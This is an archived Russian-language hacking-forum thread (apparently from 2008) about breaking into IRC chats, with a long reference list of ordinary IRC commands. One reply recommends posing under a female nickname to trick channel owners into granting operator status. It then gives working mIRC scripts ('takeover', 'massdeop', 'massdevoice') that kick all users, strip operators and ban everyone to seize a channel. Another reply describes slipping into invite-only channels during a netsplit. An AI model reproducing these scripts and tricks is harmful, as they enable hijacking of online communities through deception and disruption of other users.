Просмотр полной версии : Много Вопросы об Irc чатов
Привет Всем!
Я хочу узнать все об IRC чатов.
Подаютсья они взлому или нет (онлайн irc чаты)?
Какие есть команды в irc чате ?
Есть ли полезные сылки на стати или сайты?
Если нужна определёная сылка на чат который я хочу вломать,я могу дать.
Есть ли особенвые слабости?
Построение сылки следошие:
www.site/index.php?nick= имя&server=сервер&chan=канал&x=81&y=17
ВНИМАНИЕ ЭТО НЕ ПРОСБА О ВСЛОМЕ!
Зарание спасибо за информацию.
Скорее всего ты имеешь в виду онлайн клиенты, уязвимости в этих клиентах не помогут что либо сделать с каналом.
Зависит от того какие сервисы есть (/nickserv, /chanserv).
Скорее всего ты имеешь в виду онлайн клиенты, уязвимости в этих клиентах не помогут что либо сделать с каналом.
Зависит от того какие сервисы есть (/nickserv, /chanserv).
Тогда можно както стать админом на определеным канале?
CrazyStudentS_Mi}{
04.03.2008, 00:45
Привет Всем!
Я хочу узнать все об IRC чатов.
Есть ли полезные сылки на стати или сайты?
Если нужна определёная сылка на чат который я хочу вломать,я могу дать.
Есть ли особенвые слабости?
Построение сылки следошие:
www.site/index.php?nick= имя&server=сервер&chan=канал&x=81&y=17
ВНИМАНИЕ ЭТО НЕ ПРОСБА О ВСЛОМЕ!
Зарание спасибо за информацию.
в ирк рулит СИ, пароль там выманить просто, также очень любимм мною метод захвата мелких новоиспеченых каналов - где девушкам дают оператора, заходишь под женским ником, получаешь опа и претворяешь вот такой скрипт состоящий из нескольких разделов
############### alias takeover { %i = 1 mode # +eeee $me mode # +iSpsl 1 while $nick(#,%i) != $null { if ($nick(#,%i) !isin $me ) kick # $nick(#,%i) %quit_msg Kick №: %kickun inc %i } unset %i mode # +b * } on *:unban:#:{ if ($banmask == *!*@*) mode # +b *!*@* }
############ alias massdeop { if ($me !isop #) { %lser Ты не оператор канала. } else { %lse Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick isop #) && (%nick != $me) { mode # -o %nick } inc %i goto next :done } }
##############alias massdevoice { ;%lse1 Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 .cs devoice $chan :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick != $me) { .cs devoice $chan %nick } inc %i goto next :done } }
begin_end
04.03.2008, 23:01
LAEOT, есть в IRC уязвимости как в клиентском ПО, так и в серверном. В зависимости от преследуемой цели следует прорабатывать то либо иное направление, или оба.
Для IRC клиента наиболее распространена уязвимость, позволяющая произвести принудительный вывод пользователя из сети. Ещё, с применением СИ можно убедить пользователя установить скрипт дающий удаленное управление клиентом.
Для серверного ПО существует множество самых разных баг, например https://forum.antichat.ru/thread47764.html
В любом случае важно знать версию ПО и только потом вести дальнейшую проработку.
Рекомендую начать с изучения IRC RFC (http://www.irchelp.org/irchelp/rfc/rfc.html) и документации хотя бы Unreal IRCD (http://www.unrealircd.com/files/docs/unreal32docs.ru.html).
оформление текста:
Для того чтобы написать сообщение жирным цветом - нажмите Ctrl+b, а затем напишите своё сообщение. На канале оно будет жирным. Для подчёркивания нажмите Ctrl+u. Для раскраски сообщения в особый цвет нажмите Ctrl+k затем номер цвета (узнаете из подсказки), а при желании, через запятую, и фон сообщения и затем ваше сообщение. Ваша мессага окрасится в нужный вам цвет.
Общие команды:
/server servername[:port] [password] - команда соединения с сервером servername, port=номер порта (по умолчанию 6667), password необходим в том случае если сервер защищён паролем.
/join [-i] #channel [ключ] - заход на канал (атрибут i ставится в том случае, если вы были приглашены на канал).
/part #channel, /partall - покидание канала или всех каналов.
/nick nickname - смена текущего ника.
/list [-min число] | [-max число] - список всех каналов на IRC-сервере. Атрибуты min и max ставятся в том случае, если требуется найти каналы, не превышаюших, или не достигших данного числа.
/users - количество пользователей на сервере.
/lusers - полная информация о IRC-сервере.
/names #channel - позволяет узнать количество людей на канале.
/quit причина - уйти с IRC-сервера.
/exit - выход из IRC-сервера и закрытие чат-клиента.
/msg #channel | nick - передача сообщения на указаный канал или пользователю с указанным ником
/me действия - сообщение от первого лица (например: * pupkin пошел гулять. С учётом, что ваш ник - pupkin).
/ame действия - то же самое, только происходит передача на все каналы.
/away причина - если вам нужно ненадолго уйти, используйте данную команду. Если режим away активен и какой-либо человек, шлёт вам сообщения в приват, он получит сообщение о вашем отсутствии. Чтобы снять режим away, наберите /away без параметров.
/query nick - открытие привата с указанным ником.
/notice nick | #channel - передача индивидуального сообщение без открытие привата, или каждому юзеру на канале.
/whois nick - информация о данном нике.
/whowas nick - узнать последний приход данного ника на IRC-сервер.
/dns host | ip - узнать ip-адрес или dns-адрес данного ника.
/ignore nick!ident@host - поместить данного человека в "игнор-лист". (Также допустим игнор по нику - /ignore nick).
/invite #channel nick - пригласить данного ника на указанный канал.
CTCP команды:
/ctcp nick ping - пинг человека с указанным ником.
/ctcp nick finger - финжер человека с указанным ником.
/ctcp nick version - версия IRC-клиента у человека с указанным ником.
/ctcp nick time - время человека с указанным ником.
Команды для операторов канала:
/mode #channel mode - атрибуты канала:
+t - топик меняют только опы.
+p|+s - приватный режим: не видно, что человек находится на данном канале по его информации. Секретный режим: канал не видно в /list.
+i - invite only: попасть на канал можно только, если вас пригласили.
+m - moderated: без режима голоса (+v), на канале участник не может ничего сказать
+n - no external messages: невозможна передача сообщений извне (без захода на канал).
+l число - limit: на канал не смогут попасть больше заданного числа участников.
+k ключ - key mode: без ввода данного ключа невозможно зайти на канал.
/kick #channel nick [причина] - кикнуть человека с данным ником с указанного канала.
/mode #channel + | - mode nick - атрибуты ника на указанном канале:
o - дать/забрать оп у участника канала.
v - дать/забрать голос у участника канала.
b nick!ident@host - поставить/снять бан на участника канала.
I - поставить/удалить участника из листа приглашённых.
e - поставить/удалить участника из expect листа.
Команды для IRC-операторов:
/oper login password - стать IRC-оператором.
/mode nick + | - mode - атрибуты ника на IRC-сервере:
-o - перестать быть IRC-оператором.
w - режим приёма сообщений от других IRC-операторов.
s - режим приема сообщений от IRC-сервера.
/kill nick - "убить" человека с данным ником.
/kline nick!ident@host - забанить человека на IRC-сервер.
/rehash - обновить (с сохранёнными изменениями) IRC-сервер.
/restart - перезапуск IRC-сервера.
/die - выключить IRC-сервер.
Команды IRCX протокола:
/mode #channel + | - q nick - дать/забрать овнера.
/access #channel add Owner nick!ident@host - добавить овнера на канал.
/access #channel delete Owner nick!ident@host - удалить имеющегося овнера с канала.
/access #channel clear owner - удалить всех имеющихся овнеров с канала.
/access #channel add host nick!ident@host - добавить хост на авто-опа на канал.
/access #channel delete host nick!ident@host - удалить хост на авто-опа на канал.
/access #channel clear host - удалить все хосты на авто-оп.
/access #channel add deny nick!ident@host - добавить запрет на канал.
/access #channel delete deny nick!ident@host - удалить запрет на канал.
/access #channel clear deny - удалить все запреты на канал.
/access #channel list - просмотреть список овнеров, авто-опов и запретов.
/access #channel clear -удалить весь список овнеров, авто-опов и запретов.
/prop #channel OwnerKey - ввести ключ овнера.
/prop #channel HostKey - ввести ключ хоста.
/prop #channel memberkey - ввести ключ на канал.
/prop #channel topic топик - установить топик на канале.
/prop #channel onjoin : текст приветствия - установить текст приветствия на канале.
/prop #channel onpart : текст прощания - установить текст прощания на канале.
Привет всем.
Спасибо за информатию,много нового научилсья про irc! ;)
СИ не поможет, у меня ОЧЕНЬ плохие отношение с админом. :(
Но я уже решил проблему
как? :
Я поднал рефолуцию на чате и забрал всех ползователей! :)
Значит тут для меня кончилась проблема.
Кто хочит что то прибавить или сказать свое мнение,всегда будим ради, как я так и другие новички.
(не археолог)
Существует ли какие то способы, чтобы зайти на канал, который только по инвайтам?
(не археолог)
Существует ли какие то способы, чтобы зайти на канал, который только по инвайтам?
Да, например, во время сплита в сети (можно поменять даже там режимы, в частности поставить для себя +I). При воссоединении сети, восстанавливаются и режимы канала путём плюсования с разных серверов (учитывая, что основные режимы канала могут быть прописаны в mlock)..Тем самым у Вас есть шанс и побывать на канале и даже остаться там какое-то время незамеченным.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot